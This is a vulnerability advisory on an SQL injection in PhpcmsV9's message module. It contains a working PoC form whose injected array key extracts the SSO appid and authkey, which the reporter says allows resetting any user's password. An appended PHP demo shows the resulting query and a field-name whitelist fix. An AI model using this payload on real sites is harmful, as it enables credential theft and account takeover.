PhpcmsV9 SQL injection, 2013 New Year second vulnerability warning (the black bar safety net)

ID MYHACK58:62201337423
Type myhack58
Reporter Anonymous
Modified 2013-02-21T00:00:00


Brief description:

The second one, as promised. Thanks for your attention. This second advisory describes an unrestricted SQL injection whose end result is that any user's password can be changed, so I recommend confirming the hazard rating as high.

The next vulnerability will be posted tomorrow.

Detailed description:

In /phpcms9/phpcms/modules/message/index.php the code is as follows:

$messageid = $this->message_db->insert($_POST['info'],true);

The insert method is the crux; its code is as follows:

public function insert($data, $table, $return_insert_id = false, $replace = false) {
    if (!is_array($data) || $table == '' || count($data) == 0) {
        return false;
    }
    // keys become column names, values become the VALUES list
    $fielddata = array_keys($data);
    $valuedata = array_values($data);
    array_walk($fielddata, array($this, 'add_special_char'));
    array_walk($valuedata, array($this, 'escape_string'));
    $field = implode(',', $fielddata);
    $value = implode(',', $valuedata);
    $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
    $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'` ('.$field.') VALUES ('.$value.')';
    $return = $this->execute($sql);
    return $return_insert_id ? $this->insert_id() : $return;
}


Unfortunately,

array_walk($fielddata, array($this, 'add_special_char'));

does not validate the keys at all, only the values are escaped, so the line quoted first, which hands $_POST['info'] to insert() with attacker-controlled array keys, is a SQL injection: whatever the attacker puts in the key of info[] is concatenated into the column list of the INSERT statement.

For the PoC I read my local authkey; with it I could reset any user's password, but I have not demonstrated the later steps.

Vulnerability to prove:

Read the phpsso_server appid and authkey; with them you can call the ps_member_edit function in client.class.php to modify any user's password.


The form is as follows (change the user names and so on to your own):

<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">

<input type="hidden" name="info[replyid]" value="2" />
<input type="hidden" name="info[send_to_id]" value="cc" />
<input type="hidden" name="info[send_from_id]" value="hh" />

<!-- Exploit focus starts here: the key, not the value, carries the injection -->
<input type="hidden" name="info[status) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104,104),1)#]" value="cc" />
<!-- Exploit focus ends here -->

<table width="100%" cellspacing="0" class="table_form">
<tr>
<td><input name="info[subject]" type="text" id="subject" size="30" value="Re: hh" class="input-text"/></td>
</tr>
<tr>
<td><textarea name="info[content]" id="con" rows="5" cols="50"></textarea></td>
</tr>
<tr>
<td><input name="code" type="text" id="code" size="10" class="input-text"/> <img id="code_img" /></td>
</tr>
</table>

<input type="submit" value="Submit" />
</form>

Fix: filter the key inside the add_special_char function, so that only a plain column name can reach the SQL string.
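To make the mechanism concrete, here is a stand-alone model of the insert() builder walked through above, followed by the field-name check the fix calls for. This is an added example, not phpcms code: add_special_char() is reproduced as it behaves in phpcms v9 (backtick-quote a plain name, pass a key containing '(' or '.' through untouched), which is what lets the PoC key survive, and escape_string() is approximated with addslashes() because there is no database connection here. The table name v9_message and the database name are assumptions. Running it prints the exact INSERT the PoC form produces and shows the hardened builder rejecting the same input.

```php
<?php
// Added example (not from phpcms): model of the vulnerable insert() builder
// from the advisory, plus a hardened variant that validates field names.

function add_special_char($value) {
    // Assumed phpcms v9 behaviour: a key that looks like "*", or contains
    // '(', '.' or '`', is left exactly as the caller supplied it; only a
    // plain name gets wrapped in backticks. This is why the PoC key works.
    if ($value == '*' || strpos($value, '(') !== false
        || strpos($value, '.') !== false || strpos($value, '`') !== false) {
        return $value;
    }
    return '`' . trim($value) . '`';
}

function escape_string($value) {
    // Stand-in for the driver's escape_string(): the VALUE is escaped and
    // quoted, so the injection cannot go through the value side.
    return "'" . addslashes($value) . "'";
}

function build_insert_vulnerable(array $data, $table, $database = 'phpcms') {
    $fields = array_map('add_special_char', array_keys($data));
    $values = array_map('escape_string', array_values($data));
    return 'INSERT INTO `' . $database . '`.`' . $table . '` ('
        . implode(',', $fields) . ') VALUES (' . implode(',', $values) . ')';
}

function build_insert_hardened(array $data, $table, $database = 'phpcms') {
    // Column names are identifiers; anything else is rejected before it can
    // be concatenated into the statement.
    foreach (array_keys($data) as $key) {
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $key)) {
            throw new InvalidArgumentException('illegal field name: ' . $key);
        }
    }
    return build_insert_vulnerable($data, $table, $database);
}

// Constructed POST body matching the PoC form in the advisory. The last key
// closes the column list, supplies its own VALUES clause (the subquery lands
// in the subject column, CHAR(104,104) = 'hh' in send_from_id) and comments
// out the original VALUES clause with '#'.
$post_info = array(
    'subject'      => 'Re: hh',
    'content'      => 'hello',
    'replyid'      => '2',
    'send_to_id'   => 'cc',
    'send_from_id' => 'hh',
    'status) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104,104),1)#' => 'cc',
);

echo build_insert_vulnerable($post_info, 'v9_message'), "\n";

try {
    build_insert_hardened($post_info, 'v9_message');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The printed statement ends with `,status) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104,104),1)#) VALUES ('Re: hh',...)`, which MySQL executes up to the `#`; the attacker then reads the new message whose subject contains appid*authkey. An identifier whitelist on the key side is the only real fix, since escaping is a string-literal defence and never applies to column names.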